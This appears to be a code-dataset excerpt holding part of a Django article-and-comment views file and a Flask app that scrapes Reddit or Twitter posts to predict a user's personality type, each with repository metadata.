article = Article.objects.get(pk=article_pk)
if request.method == 'POST':
article.delete()
return redirect('articles:index')
else:
return redirect(article)
def update(request, article_pk):
article = Article.objects.get(pk=article_pk)
if request.method == 'POST':
article.title = request.POST.get('title')
article.content = request.POST.get('content')
article.image = request.FILES.get('image')
article.save()
return redirect(article)
else:
context = {'article': article,}
return render(request, 'articles/update.html', context)
def comments_create(request, article_pk):
# 댓글을 달 게시글
article = Article.objects.get(pk=article_pk)
if request.method == 'POST':
# form에서 넘어온 댓글 정보
content = request.POST.get('content')
# 댓글 생성 및 저장
comment = Comment(article=article, content=content)
comment.save()
return redirect(article)
# return redirect('articles:detail', article.pk)
# return redirect('articles:detail' article_pk)
else:
return redirect(article)
def comments_delete(request, article_pk, comment_pk):
# article = Article.objects.get(pk=article_pk)
if request.method == 'POST':
comment = Comment.objects.get(pk=comment_pk)
comment.delete()
# return redirect(article)
return redirect('articles:detail', article_pk)
|
[
"[email protected]"
] | |
1a978bc0c5339f155784d67e949cf1b613a17034
|
112b6fbda45328775cde667d084f7c4a2c5898bf
|
/app.py
|
9a3521caf6c87e0927ff12566f8c63d9f210161a
|
[] |
no_license
|
jenienam/Online-Personality-App
|
5a93fe37075198bf73cdb70f45dac43ed97a8125
|
1d913f4d9e6bc00beb358153b3f91234cd0176da
|
refs/heads/master
| 2022-12-16T05:27:19.138811 | 2020-09-17T07:17:11 | 2020-09-17T07:17:11 | 287,020,047 | 1 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 1,432 |
py
|
# Dependencies
import numpy as np
from flask import Flask, request, render_template
import requests
from web_scraper import redditScraper, twitterScraper
from data_cleaning import calculateModelParameters
from model import personalityTypeResult
app = Flask(__name__)
@app.route('/')
def home():
return (render_template('index.html'))
@app.route('/reddit',methods = ['POST', 'GET'])
def predict_reddit():
if request.method == 'POST':
username = request.form['reddit-username']
comments = redditScraper(username)
scores = calculateModelParameters(comments)
personality = personalityTypeResult(comments)
return (render_template('result.html', username=username, comments=comments, scores=scores, personality=personality))
@app.route('/twitter',methods = ['POST', 'GET'])
def predict_twitter():
if request.method == 'POST':
username = request.form['twitter-username']
comments = twitterScraper(username)
scores = calculateModelParameters(comments)
personality = personalityTypeResult(comments)
return (render_template('result.html', username=username, comments=comments, scores=scores, personality=personality))
@app.route('/data')
def data():
return (render_template('data.html'))
@app.route('/about')
def about():
return (render_template('about.html'))
if __name__ == "__main__":
app.run(debug=True)
|
[
"[email protected]"
] |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.